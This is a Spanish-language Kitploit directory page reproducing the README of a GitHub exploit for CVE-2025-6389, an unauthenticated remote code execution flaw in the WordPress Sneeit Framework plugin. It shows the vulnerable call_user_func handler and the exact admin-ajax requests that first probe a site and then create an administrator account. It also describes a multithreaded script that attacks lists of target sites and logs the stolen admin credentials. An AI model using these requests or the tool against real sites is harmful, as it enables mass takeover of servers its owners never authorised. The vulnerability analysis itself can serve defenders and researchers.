Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 - Ejecución Remota de Código no Autenticada en sneeit_articles_pagination_callback | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-6389
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 - Ejecución Remota de Código no Autenticada en sneeit_articles_pagination_callback

Ver Repositorio
11hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-6389

Sneeit Framework <= 8.3 - Ejecución Remota de Código sin Autenticación en sneeit_articles_pagination_callback

    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python License


📡 No te pierdas la próxima publicación. Sigue @KNxploited en Telegram: el canal definitivo para CVEs recién divulgados, exploits funcionales e investigación de seguridad de élite. Los primeros en enterarse. Los primeros en actuar.


🧠 Descripción general

CVE-2025-6389 es una vulnerabilidad de Ejecución Remota de Código de severidad Crítica (CVSS 9.8) encontrada en el plugin Sneeit Framework para WordPress.

El fallo se encuentra en la función sneeit_articles_pagination_callback(), que pasa ciegamente entrada proporcionada por el usuario a la función call_user_func() de PHP. Un atacante no autenticado puede llamar a cualquier función de PHP con argumentos arbitrarios, incluida wp_insert_user, otorgándose de forma efectiva acceso total de administrador o ejecutando cualquier código del lado del servidor.

CampoDetalles
ID CVECVE-2025-6389
PluginSneeit Framework (sneeit-framework)
Versiones afectadasTodas las versiones hasta la 8.3 inclusive
Tipo de vulnerabilidadEjecución Remota de Código (RCE)
Vector de ataqueRed — No se requiere autenticación
Puntuación CVSS 3.19.8 CRÍTICA
Vector CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactoCompromiso total del servidor / Toma de control del administrador
InvestigadorNxploited

💀 Análisis en profundidad de la vulnerabilidad

La causa raíz es el uso indebido de la función call_user_func() de PHP en el manejador AJAX del plugin:

// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← User-controlled function name
    $args     = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args

    // Calling ANY PHP function with ANY arguments — zero validation
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

Por qué esto es crítico:

  • wp_ajax_nopriv_* = accesible por cualquier persona, sin necesidad de iniciar sesión
  • call_user_func($callback, $args) = invocación arbitraria de funciones
  • El atacante puede llamar a var_dump, system, wp_insert_user, eval o cualquier función de PHP/WordPress
  • La respuesta se devuelve directamente, lo que permite RCE ciega y verbosa

⚔️ Cadena de explotación

Step 1 — Probe / Fingerprint
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Expected Response → array(1) { [0]=> string(4) "test" }
  ↓
Confirms: call_user_func() is reachable and reflecting output

──────────────────────────────────────────────────────────────────
Step 2 — Admin Account Creation
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Result → New administrator account silently created on target
  ↓
Full WordPress admin panel access achieved ✔️

⚙️ Requisitos

pip install requests rich
DependenciaPropósito
requestsPeticiones HTTP con soporte de sesión/proxy
richPanel de terminal en vivo, paneles, progreso
threadingProcesamiento concurrente de múltiples objetivos
queueDistribución de objetivos segura para hilos

Se requiere Python 3.8+. Las anotaciones de tipo usan la sintaxis tuple[...] introducida en 3.9+: usa 3.9+ para obtener la mejor compatibilidad.


📂 Estructura de archivos

CVE-2025-6389/
├── CVE-2025-6389.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: successful targets + credentials
└── debug_responses/          # Auto-generated: raw server responses for debugging
    └── <target>.resp.txt

🚀 Uso

Paso 1 — Preparar los objetivos

Crea list.txt con una URL por línea:

https://target1.com
https://target2.com
http://target3.com

Las URL sin http:// o https:// reciben automáticamente el prefijo http://.


Paso 2 — Ejecutar el exploit

python CVE-2025-6389.py

Se te pedirá lo siguiente:

Targets file name (default list.txt): list.txt
Number of threads (default 10):       20

Paso 3 — Panel en tiempo real

El script lanza un panel de Rich en tiempo real que muestra:

┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Stats                               │
│  Usage: Put targets in...    │  Total Targets:  150                 │
│  Threads: 20                 │  Processed:      87                  │
│  Password: xplpass           │  Successes:      12                  │
│  Success Log: success...     │  Failures:       75                  │
│  Debug Dir: debug_responses  │  Elapsed:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Recent Results                                                      │
│  Time     Target                              Result                 │
│  14:23:01 https://victim.com                  SUCCESS               │
│  14:23:03 https://example.net                 FAIL                  │
└─────────────────────────────────────────────────────────────────────┘

Paso 4 — Revisar los resultados

Los exploits exitosos se guardan en success_results.txt:

https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]
Descargar herramienta